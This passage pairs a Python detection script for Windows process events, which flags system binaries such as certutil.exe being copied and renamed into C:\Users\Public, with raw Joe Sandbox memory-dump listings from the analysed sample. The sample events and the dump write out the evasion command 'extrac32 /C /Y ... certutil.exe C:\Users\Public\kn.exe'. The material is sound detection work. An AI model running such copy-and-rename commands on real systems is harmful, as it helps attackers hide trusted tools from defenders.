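SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE_DIRS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
PUBLIC_DIR = "c:\\users\\public\\"
# Tools (and the cmd builtin) that can duplicate a file; extrac32 /C is the
# variant the sample used.
COPY_TOOLS = {"extrac32", "xcopy", "robocopy", "esentutl", "copy"}

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def norm(path: str) -> str:
    return path.strip('"').lower()


def base(path: str) -> str:
    """File name component of a path, lower-cased."""
    return norm(path).rsplit("\\", 1)[-1]


def tool_name(token: str) -> str:
    """'C:\\Windows\\System32\\extrac32.exe' and 'extrac32' both map to 'extrac32'."""
    name = base(token)
    return name[:-4] if name.endswith(".exe") else name


def analyse(event: Dict[str, str]) -> List[str]:
    """Return finding names for one process-creation event (empty list = nothing seen)."""
    findings: List[str] = []
    image = norm(event.get("Image", ""))
    parent = norm(event.get("ParentImage", ""))
    tokens = tokenize(event.get("CommandLine", ""))

    # Rule 1/2: execution from, or a parent living in, C:\Users\Public.
    if image.startswith(PUBLIC_DIR):
        findings.append("execution_from_public_folder")
    if parent.startswith(PUBLIC_DIR):
        findings.append("parent_in_public_folder")

    # Rule 3: a copy tool duplicating a sensitive system binary into a
    # user-writable directory, optionally under a new name.
    tool_idx = next((i for i, t in enumerate(tokens) if tool_name(t) in COPY_TOOLS), None)
    if tool_idx is not None:
        # Skip switches such as /C /Y and keep only path-looking arguments.
        paths = [t for t in tokens[tool_idx + 1:]
                 if not t.startswith(("/", "-")) and "\\" in t]
        if len(paths) >= 2:
            src, dst = paths[0], paths[1]
            if (norm(src).startswith(SYSTEM_DIRS)
                    and base(src) in SENSITIVE_BINARIES
                    and norm(dst).startswith(USER_WRITABLE_DIRS)):
                renamed = base(dst) != base(src)
                findings.append("lolbin_copied_and_renamed" if renamed
                                else "lolbin_copied_to_user_dir")
    return findings


def scan(events: Iterable[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(Image, finding) pairs for every event that triggers a rule."""
    return [(e.get("Image", ""), f) for e in events for f in analyse(e)]


# Constructed records: the copy step seen in the sandbox run, the renamed
# binary launched from Public, a benign cabinet extraction, and the cmd.exe
# builtin `copy` duplicating cmd.exe itself.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\extrac32.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe"},
    {"Image": "C:\\Users\\Public\\kn.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "C:\\Users\\Public\\kn.exe"},
    {"Image": "C:\\Windows\\System32\\extrac32.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "extrac32 /Y C:\\Users\\bob\\Downloads\\driver.cab C:\\Users\\bob\\Temp\\"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd.exe /c copy C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe"},
]

if __name__ == "__main__":
    for image, finding in scan(SAMPLE_EVENTS):
        print(f"{finding:30s} {image}")
```

The copy rule deliberately keys on the source path rather than the process image: once certutil.exe is running as kn.exe, only its hash, its PE version resource, or the preceding copy event still tie it back to certutil, so the copy itself is the cheapest place to catch the technique.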
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$iswspacewcschr
                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                      • API String ID: 840959033-3627297882
                                      • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                      • Instruction ID: 84ccae9cf6bb8ef8ba266d600c495aba10c69bcca11557a0e2c2c3b5d9a0dc12
                                      • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                      • Instruction Fuzzy Hash: 97D17DABE0864386FB50BB21E8552B9A7A0EF44F5CFCC9435CA4D86295DF3CE8458770
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$EnvironmentVariable
                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                      • API String ID: 198002717-267741548
                                      • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                      • Instruction ID: 2cbf87229a563b696bb34880949a59dff5744b50a9bc453c16b8babc0712eaa2
                                      • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                      • Instruction Fuzzy Hash: 065181ABE0868386F6507B11B840279EBA0FF49F99FCCA035CA0E97654DF7DE4448360
                                      APIs
                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF000
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF031
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF0D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigitiswspacewcschr
                                      • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                      • API String ID: 1595556998-2755026540
                                      • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                      • Instruction ID: 2dad7137da83c0a4811081772e2b18503bf7e864f9f146270bf36129251ce9c6
                                      • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                      • Instruction Fuzzy Hash: 50227EEFD0865385FA607B15E444279EAA0BF05F98FDC5936DA8D422E0DF3CA4429770
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                      • String ID: "$=,;
                                      • API String ID: 3545743878-4143597401
                                      • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                      • Instruction ID: bb554990267ab4958dd4a07af54049f870b490769d29829265839a3d24e2441f
                                      • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                      • Instruction Fuzzy Hash: 37C181EBA0969382EB656B11D000379FAA1FF85F4CFCD9835DA4E47394EF3CA4458260
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CurrentFormatMessageThread
                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                      • API String ID: 2411632146-3173542853
                                      • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                      • Instruction ID: 1d326c0d198bc09aa12f415690e7aea9be66423552efcc111c3b6557cc08d57d
                                      • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                      • Instruction Fuzzy Hash: 7A615DFAA0978381EA64FB61A5085B9A3A0FF44F8CFC8113ADA5D57758CF3CE5418760
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CreateFile_open_osfhandle
                                      • String ID: con
                                      • API String ID: 2905481843-4257191772
                                      • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                      • Instruction ID: 374f612b63c3c6b251445eaf95032d11491ccb1462b95c464da7b55460eaf717
                                      • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                      • Instruction Fuzzy Hash: 7471DAB7A086838AE360AF54E440679F6A0FB4AF75FD84234DA5E42794DF3CD445C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                      • String ID:
                                      • API String ID: 3829876242-3916222277
                                      • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                      • Instruction ID: 611d952a9ce7c3b998ed60b7c6f603e4dff9de81529cb2d93747513e328670fd
                                      • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                      • Instruction Fuzzy Hash: 7261616BA0868386E654AB11D41017EFBA1FF89F98F899234DE1E47794DF3CE9058720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                      • String ID: CSVFS$NTFS$REFS
                                      • API String ID: 3510147486-2605508654
                                      • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                      • Instruction ID: 8999e5da9e8b63699fbe65cc9a7a1410ec433d09ddf45d9770235587c1a7e28e
                                      • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                      • Instruction Fuzzy Hash: D9616E77704BC68AEBA19F21D8443E9B7A4FB85B88F884135CA0D8B758DF78D245C710
                                      APIs
                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF755CA7279,?,?,?,?,?,00007FF755CABFA9), ref: 00007FF755CC4485
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: longjmp
                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                      • API String ID: 1832741078-366822981
                                      • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                      • Instruction ID: da8f60e380d817feaad94abab3b5c6df8d613936da68d362f1436af081f7be86
                                      • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                      • Instruction Fuzzy Hash: 3AC1B2EAF0C68381E664FB0591805B8A7A1BB46F8EFDDA072CD1D97691CF6CE445C320
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • memset.MSVCRT ref: 00007FF755CABA2B
                                      • wcschr.MSVCRT ref: 00007FF755CABA8A
                                      • wcschr.MSVCRT ref: 00007FF755CABAAA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heapwcschr$AllocProcessmemset
                                      • String ID: -$:.\$=,;$=,;+/[] "
                                      • API String ID: 2872855111-969133440
                                      • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                      • Instruction ID: 0281ed1dcdce4a89e8a7201be2150ab61701b2e2bda01166c7b3bcc1b8e22d4f
                                      • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                      • Instruction Fuzzy Hash: 3AB194BBA0D68381FA60AB15E044279ABA0FF44F9CFD95635CA5E47794DF7CE8418320
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                      • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      • API String ID: 1606811317-2340392073
                                      • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                      • Instruction ID: f4313fc6511e115357e6c180e4115cc7f628ecb7f8905f17207c1d52cb848670
                                      • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                      • Instruction Fuzzy Hash: 3DD191AFE08A8381E651AB15E8042B9ABA0FF45F98FDC4135DA5D177A5DF3CE805C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$ErrorLast$InformationVolume
                                      • String ID: %04X-%04X$~
                                      • API String ID: 2748242238-2468825380
                                      • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                      • Instruction ID: 3e7f069f0ef052ec48d9cd97886c616e2190eab2c34642465db2102d99cfc2f8
                                      • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                      • Instruction Fuzzy Hash: E1A1A5B7708BC286EB659F2198402E9B7A1FB84B88FC84135D94D5BB48EF3CD645C710
                                      APIs
                                      • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB6677
                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB668F
                                      • _errno.MSVCRT ref: 00007FF755CB66A3
                                      • wcstol.MSVCRT ref: 00007FF755CB66C4
                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB66E4
                                      • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB66FE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                      • API String ID: 2348642995-441775793
                                      • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                      • Instruction ID: ed0af47234d59f2dfbb3ea1ef21544d7b0fa30bcb17536f4110cc0718e4b0a73
                                      • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                      • Instruction Fuzzy Hash: 16715FABD08A8785E7606F21D450179F7A0FB45FA8BDCD135DA8E56394EF3CA884C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                      • String ID: FAT$~
                                      • API String ID: 2238823677-1832570214
                                      • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                      • Instruction ID: 38116dba36b65c5341adbe5be3fcc57d4b9775f5ad283fd6aacacb2c7907d5ac
                                      • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                      • Instruction Fuzzy Hash: AA717477608BC28AEB61DF21D8502E9B7A0FB85B49F884435DA4D4B754DF3CD645C710
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF755CAFE2A), ref: 00007FF755CAD884
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF755CAFE2A), ref: 00007FF755CAD89D
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF755CAFE2A), ref: 00007FF755CAD94D
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF755CAFE2A), ref: 00007FF755CAD964
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CADB89
                                      • wcstol.MSVCRT ref: 00007FF755CADBDF
                                      • wcstol.MSVCRT ref: 00007FF755CADC63
                                      • memmove.MSVCRT ref: 00007FF755CADD33
                                      • memmove.MSVCRT ref: 00007FF755CADE9A
                                      • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF755CAFE2A), ref: 00007FF755CADF1F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
